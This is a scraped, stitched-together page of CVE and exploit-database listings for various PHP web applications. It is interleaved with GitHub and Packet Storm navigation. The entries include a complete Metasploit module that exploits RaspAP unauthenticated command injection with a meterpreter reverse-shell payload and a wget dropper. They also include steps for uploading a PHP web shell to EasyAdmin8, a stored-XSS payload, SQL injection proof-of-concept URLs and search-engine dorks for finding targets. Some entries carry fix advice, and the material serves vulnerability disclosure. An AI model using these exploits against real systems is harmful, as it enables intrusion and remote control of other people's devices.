webchess v1.0 was discovered to contain a SQL injection vulnerability via the $playerID parameter at mainmenu.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-39851: vulnerability-report/webchess_CVE-2023-39851 at main · KLSEHB/vulnerability-report

DVWA v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at blind\source\high.php.

CVE-2023-39848: GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)

Doctormms v1.0 was discovered to contain a SQL injection vulnerability via the $userid parameter at myAppoinment.php.

CVE-2023-39852: vulnerability-report/Doctormms_CVE-2023-39852 at main · KLSEHB/vulnerability-report

SQL Injection vulnerability in eVotingSystem-PHP v.1.0 allows a remote attacker to execute arbitrary code and obtain sensitive information via the user input fields.

**1\. SQL Injection Vulnerability**

_Vulnerability Description:_ The code directly inserts user input into an SQL query, which can lead to SQL injection attacks. Malicious users can manipulate, delete, or disclose data from the database by injecting malicious SQL code through input fields.

_Code Location:_

$query = 'SELECT \* FROM voters WHERE username = "'. $username .'"';
$record = mysqli\_query($cxn,$query);

_Vulnerability Impact:_ Exploiting this vulnerability can result in unauthorized access to sensitive data, data manipulation, or even a complete compromise of the database.

_Recommendation:_ To mitigate the SQL injection vulnerability, it is recommended to use prepared statements or parameterized queries. Prepared statements separate user input from the SQL query, preventing malicious input from being interpreted as SQL code. The fixed code is as follows:

$stmt = $cxn\->prepare("SELECT \* FROM voters WHERE username = ?");
$stmt\->bind\_param("s", $username);
$stmt\->execute();
$record = $stmt\->get\_result();
$getfield = $record\->fetch\_assoc();

**Summary:** Fixing this vulnerability by implementing prepared statements significantly enhances the security of the code. Prepared statements prevent SQL injection attacks by separating user input from the SQL query.

Please note that this report is provided for informational purposes and should be shared with the responsible person of the GitHub project for further action.

CVE-2023-38916: SQL Injection Vulnerability · Issue #1 · Mohammad-Ajazuddin/eVotingSytem-PHP

File Upload vulnerability in Wolf-leo EasyAdmin8 v.1.0 allows a remote attacker to execute arbtirary code via the upload type function.

  
Enter the backend, find the configuration options, and add the upload type PHP  
http://localhost/admin/index/index.html#/admin/system.uploadfile/index.html

Click on product management options： http://www.easyadmin8.com/admin/index/index.html#/admin/mall.goods/index.html  
add a new product  
click image icon  

upload a.php  
  
then getshell  

Fix for file upload vulnerability:

1.  The upload module needs to exist on the website, and permission authentication needs to be done to prevent anonymous users from accessing it.
2.  The file upload directory is set to prohibit script file execution. Even if the dynamic script of the uploaded backdoor cannot be parsed, causing the attacker to abandon this attack path.
3.  Set up a whitelist for uploading, which only allows images to be uploaded, such as jpg png gif. Other files are not allowed to be uploaded.
4.  The uploaded suffix name must be set to an image format such as jpg png gif.

CVE-2023-38915: Arbitrary file upload vulnerability causing getshell · Issue #1 · wolf-leo/EasyAdmin8

RaspAP is feature-rich wireless router software that just works on many popular Debian-based devices, including the Raspberry Pi. A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php. Successfully tested against RaspAP 2.8.0 and 2.8.7.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'RaspAP Unauthenticated Command Injection',        'Description' => %q{          RaspAP is feature-rich wireless router software that just works          on many popular Debian-based devices, including the Raspberry Pi.          A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows          unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id          parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.          Successfully tested against RaspAP 2.8.0 and 2.8.7.        },        'License' => MSF_LICENSE,        'Author' => [          'Ege BALCI <egebalci[at]pm.me>', # msf module          'Ismael0x00', # original PoC, analysis        ],        'References' => [          ['CVE', '2022-39986'],          ['URL', 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'],          ['URL', 'https://github.com/advisories/GHSA-7c28-wg7r-pg6f']        ],        'Platform' => ['unix', 'linux'],        'Privileged' => false,        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => :wget,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DisclosureDate' => '2023-07-31',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => []        }      )    )    register_options(      [        Opt::RPORT(80),        OptString.new('TARGETURI', [ true, 'The URI of the RaspAP Web GUI', '/'])      ]    )  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),      'method' => 'POST'    )    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    if res.code == 200      return CheckCode::Appears    end    CheckCode::Safe  end  def execute_command(cmd, _opts = {})    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),      'method' => 'POST',      'vars_post' => {        'cfg_id' => ";#{cmd};#"      }    )  end  def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager    end  endend

RaspAP 2.8.7 Unauthenticated Command Injection

Blood Donor Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Blood Donor Management System - Stored XSS# Application: Blood Donor Management System# Version: v1.0   # Bugs:  Stored XSS# Technology: PHP# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/blood-donor-management-system-using-codeigniter/# Date: 15.08.2023# Author: Ehlullah Albayrak# Tested on: Windows#POC========================================1. Login to user account2. Go to Profile 3. Change "State" input and add "<script>alert("xss")</script>" payload.4. Go to http://localhost/blood/welcome page and search "O", XSS will be triggered.#Payload: <script>alert("xss")</script>

Blood Donor Management System 1.0 Cross Site Scripting

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

**eLitius 1.0 Backup Disclosure**

Posted Aug 15, 2023

Authored by indoushka

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

tags | exploit, root, info disclosure

SHA-256 | 37a6ad9ab40e37e23d7cbfe01ee9334c417b3339776c4691b7ae872e89ddb896

Download | Favorite | View

**eLitius 1.0 Backup Disclosure**

    ====================================================================================================================================| # Title     : eLitius v1.0 Backup Disclosure Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://elitius.com/download/eLitius_v_1_0.tar.gz                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use payload : /backup/[+] http://wingro/cmim/backup/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,960)
*   Arbitrary (16,198)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,432)
*   Encryption (2,370)
*   Exploit (51,887)
*   File Inclusion (4,222)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,773)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,674)
*   Local (14,452)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,773)
*   Root (3,582)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,887)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,372)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,775)
*   Web (9,664)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,938)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,457)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,727)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,816)
*   UNIX (9,290)
*   UnixWare (186)
*   Windows (6,573)
*   Other

eLitius 1.0 Backup Disclosure

Elite CMS Pro version 2.01 suffers from a remote SQL injection vulnerability.

    ======================================================================================================================================| # Title     : Elite CMS Pro V2.01 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                              || # Vendor    : http://elitecms.net/                                                                                                 |  | # Dork      : Powered by Elite CMS Pro - Version 2.01                                                                              |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] http://127.0.0.1/index.php?mpage=3&subpage=1%27 <=====| iinject here[+] Panel :http://127.0.0.1/admin/login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Elite CMS Pro 2.01 SQL Injection

A vulnerability was found in phpRecDB 1.3.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument r/view leads to cross site scripting. The attack may be launched remotely. VDB-237194 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Tag

#php